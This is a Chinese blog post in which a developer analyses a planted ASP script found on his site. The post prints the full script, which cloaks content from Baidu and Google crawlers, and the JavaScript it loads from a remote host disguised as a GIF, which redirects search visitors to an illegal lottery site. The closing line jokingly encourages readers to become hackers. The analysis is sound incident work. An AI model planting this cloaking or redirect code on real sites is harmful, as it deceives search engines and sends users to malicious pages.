`
callmeali
  • 浏览: 2229 次
  • 性别: Icon_minigender_1
  • 来自: 南宁
最近访客 更多访客>>
文章分类
社区版块
存档分类
最新评论

搜索引擎欺骗病毒的一些研究

阅读更多
   之前网站上有一个专题总是被百度收录成非法彩票信息,打开网页看正常,页面源代码也查找不到非法彩票的相关字眼,甚是奇怪,未果。今日领导又提及此事,便不知如何是好,只能硬着头皮彻头彻尾的仔细寻找,更新cdn,杀毒软件扫描也正常,正在绝望之际,发现目录下多了个脚本文件index.asp。暗喜,原来罪魁祸首在此。把它rename,在用搜索抓取模拟器测试,正常。

    下面兴趣之余,打开文件来研究。

<%
Function check(user_agent)
    allow_agent=split("Baiduspider,Googlebot",",")
    check_agent=false
    For agents=lbound(allow_agent) to ubound(allow_agent)
        If instr(user_agent,allow_agent(agents))>0 then
            check_agent=true
            exit for
        end if 
    Next
    check=check_agent
End function
canshu=Request.ServerVariables("query_string")
user_agent=Request.ServerVariables("HTTP_USER_AGENT")
Refer=Request.ServerVariables("HTTP_REFERER")
If check(user_agent)=true then
%>
<!--#include file="../a_images/pic.jpg"-->
<%else%>
<%
Refer=Request.ServerVariables("HTTP_REFERER")
if Instr(Refer,"wd=%C1%F9%BA%CF%B2%CA")<>0 or Instr(Refer,"wd=%E5%85%AD%E5%90%88%E5%BD%A9")<>0 Then%>
<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>
<%
response.end
end if%>
<!--#include file="index.shtml"-->
<%end if%>




    因为本人是写java的,asp不太熟,而且只用过c#写asp,看上去又不像vb,不过从第一行就看得出它想做什么了。  allow_agent=split("Baiduspider,Googlebot",","),显然,是对搜索引擎做处理,不用猜也知道,他下面的脚本应该是要欺骗搜索引擎了。欺骗搜索引擎,他应该要转向一个他自己的病毒页面,应该有url地址才对,但是脚本竟然没有url地址出现过,迷茫。

    但是,有个极为可以的地方,<script language="javascript" src="http://bde300.cn/images/gov.gif"></script>这个标签要加载一个js脚本,但是地址竟然是个gif图片?神奇。习惯上会把这个地址复制到浏览器上看看是啥玩意儿。失望,是一个红叉。

    以正常思路这个图片是不存在,但是谁又知道该地址背后隐藏的秘密?打开下载工具,把图片地址复制上去,保存为txt文件。不看不知道,一看吓一跳,打开文件竟然是熟悉的javascript脚本。如果不处处怀疑,做梦也不会想到这个不存在的图片就是关键所在。牛B。

    代码如下:

GIF89a="";
var d=document.referrer;
if ((d.indexOf("wd=%C1%F9%BA%CF%B2%CA")>0)||(d.indexOf("wd=%CF%E3%B8%DB%C1%F9%BA%CF%B2%CA")>0)){
if((window.location.href.indexOf("baotou")>0)||(window.location.href.indexOf("cnhubei")>0)){
window.location.href="http://www.58887888.net./";
}
else{
window.location.href="http://www.58887888.net./index2.htm";
}
}



    上面有两个url地址:ht tp://www.58887888.net./,ht tp://www.58887888.net./index2.htm,就是带非法彩票信息的页面了。不去研究又怎知道,原来我们看到的一个很正常的网页,在搜索引擎眼里竟然是一个非法彩票网页。欧麦嘎,这就是黑客,只要利用服务器的漏洞写入一个不到1kg的脚本文件,不仅把大家的肉眼欺骗了,连度娘和谷哥也蒙在鼓里,哈哈,是不是心动想做黑客了吧,心动不如行动。。。
分享到:
评论

相关推荐

    恶性木马专杀工具解决顽固病毒木马浏览器首页劫持问题

    这是许多恶意软件惯用的手段之一,通过篡改浏览器设置,将用户的默认首页或搜索引擎改为黑客指定的网址,以此来推送广告、收集用户数据或进一步传播恶意软件。这种行为不仅影响用户的网络体验,还可能带来隐私泄露的...

    关机欺骗杀软|推荐代码

    "广覆SEO优化"标签可能指的是恶意软件作者尝试通过搜索引擎优化(SEO)技术提高其恶意软件在搜索结果中的排名,以增加下载的可能性。这通常涉及在恶意网站上使用关键词和元标签,使其更容易被搜索到,从而吸引更多的...

    网站优化 SEO.pdf

    有站点网络营销则基于企业自建网站,通过搜索引擎营销、病毒式营销、许可邮件营销等方式进行推广。 搜索引擎营销(SEM)是SEO的一种形式,包括自然排名优化和竞价排名。自然排名是通过改善网站内容和结构,使搜索...

    白帽,seo为什么更好,转载.docx

    相比之下,黑帽SEO倾向于采用欺骗性的手法来快速提高排名,但这往往牺牲了用户体验,最终可能导致搜索引擎惩罚。 #### 三、社交营销的影响 社交平台如Facebook、Twitter等在现代营销中扮演着越来越重要的角色。...

    黑帽SEO工具

    1. **WPCloaker**: 一款用于隐藏真实网页内容,以欺骗搜索引擎的工具。 2. **PressBot**: 可能用于自动发布新闻稿,通过外部链接来提升网站权重。 3. **WPSyndicator**: 自动抓取RSS源内容,并重新发布到目标站点,...

    最火专业网络工程论文题目.docx

    4. **静态Web技术研究**:关注静态网站的构建和优化,以提高页面加载速度和搜索引擎优化。 5. **语义Web服务关键技术研究**:研究如何通过语义技术增强Web服务的发现、组合和理解能力。 6. **面向语义Web服务的...

    百度培训资料:恶劣低质网页特征标注-五档打分

    这些网页往往采用不正当手段来欺骗搜索引擎,以获得更高的排名。它们的特点包括但不限于:内容质量低下、用户体验差、存在误导性信息等。 ##### 2.2 分类 恶劣低质网页主要分为两大类:“内容维度”和“受益维度”...

    最新的PR劫持技术

    在网络安全领域,PR劫持(Page Rank Hijacking)是一种利用搜索引擎优化(SEO)的恶意技术,旨在欺骗搜索引擎,提高目标网站在搜索结果中的排名。PR劫持通常涉及篡改网页内容或利用DNS漏洞,以非法获取高PageRank值...

    360的安全机制简述

    它在用户进行网络浏览时,会自动识别并阻止访问含有恶意代码的网站,同时搜索引擎保护功能可对搜索结果进行风险评估,避免用户误点击不安全链接。 2. **沙箱技术**:为了防止用户在浏览可能含有病毒的网站时中招,...

    钓网银程序 钓网银源码

    【标签】"钓网银程序 钓网银源码"再次强调了主题,这些标签通常会被搜索引擎和相关社区用来分类和识别内容。对于公众来说,了解这些标签可以帮助他们识别和避免潜在的网络风险,比如不要随意下载和运行未知来源的...

    网络信息安全复习+案例分析

    如: 1. 密钥管理:就是管理密钥从生产到销毁的过程,包括密钥的产生、存储、分配、保护、更新、吊销和销毁等。 2. 非对称密钥包括:公钥和私钥。 3. 密钥从作用上可以分为...6. 网络空间搜索引擎: 撒旦; 钟馗之眼。

    计算机会考客观题.doc

    7. 信息检索方式:在搜索引擎中输入关键词进行搜索,属于关键词搜索,而非分类搜索、专业垂直搜索或目录检索。 8. 多媒体技术发展:近年来,多媒体技术重点发展了智能化和虚拟现实技术,使得交互性和体验感大大增强...

    百度站长平台:将重点清查影视站点欺诈问题.docx

    标题中的“百度站长平台:将重点清查影视站点欺诈问题”揭示了百度作为搜索引擎巨头,对影视类网站的欺诈行为采取的严厉行动。百度站长平台是互联网内容提供者与百度之间的重要桥梁,它旨在帮助网站管理员优化其站点...

    IE非法劫持修复工具V10

    4. **修复**:恢复浏览器的正常设置,包括主页、搜索引擎等,并清理恶意插件。 5. **预防**:提供防护机制,防止类似问题再次发生,比如更新安全库,加强防火墙规则。 **使用方法** 使用IE非法劫持修复工具V10时,...

    PHP寄生虫繁殖劫持程序V3.0

    这些页面通常包含精心构造的元标签和内容,以欺骗搜索引擎。 4. **隐藏与逃避**:通过修改文件权限、使用混淆代码等方式,使恶意文件难以被系统管理员发现和删除。 5. **持续更新**:版本号为V3.0,暗示该程序可能...

    计算机(20211010230501).pdf

    9. 搜索引擎主要任务包括信息搜集、处理和查询,不包含信息度量。 10. bps(bits per Second)代表比特每秒,是数据通信中传输速率的单位。 11. 发送电子邮件需要拥有电子邮箱账号。 12. Premiere是一款视频编辑...

    php脚本资料电子书籍

    搜索引擎技术核心揭密(PHP) 谈php+mysql注射语句构造 通过对php一些服务器端特性的配置加强php的安全 学习phpnuke漏洞 用PHP函数解决SQL injection 在php中使用sockets从新闻组中获取文章 紫桐VBB2.28论坛漏洞利用...

    SNS社区网站怎么运营

    SEO(搜索引擎优化)和口碑营销是关键,但需要投入时间和精力,并确保内容的质量和合法性。欺骗性的SEO策略可能会短暂带来流量,但无法建立长期用户基础。 2. **明星用户营销**:利用行业内的知名人物,无论是草根...

    桌面右上角iStart Everything will be found流氓软件弹窗一键删除工具

    一旦安装,它会篡改浏览器设置,使默认搜索引擎变为iStart的搜索服务,而且很难通过常规方式卸载。用户可能发现即使尝试从控制面板或程序管理器中移除,也无法彻底删除这个烦人的插件。 针对这种情况,"iStart一键...

    电子商务概论A卷(20211019201815).pdf

    5. 常用的网络营销方法包括搜索引擎营销、微信营销、博客营销和病毒性营销,对应ABCD选项。 **简答题**则要求学生对关键概念和策略进行深入分析: 1. 保护虚拟财产的方法包括依赖合同和交易平台的规定,以及增强...

Global site tag (gtag.js) - Google Analytics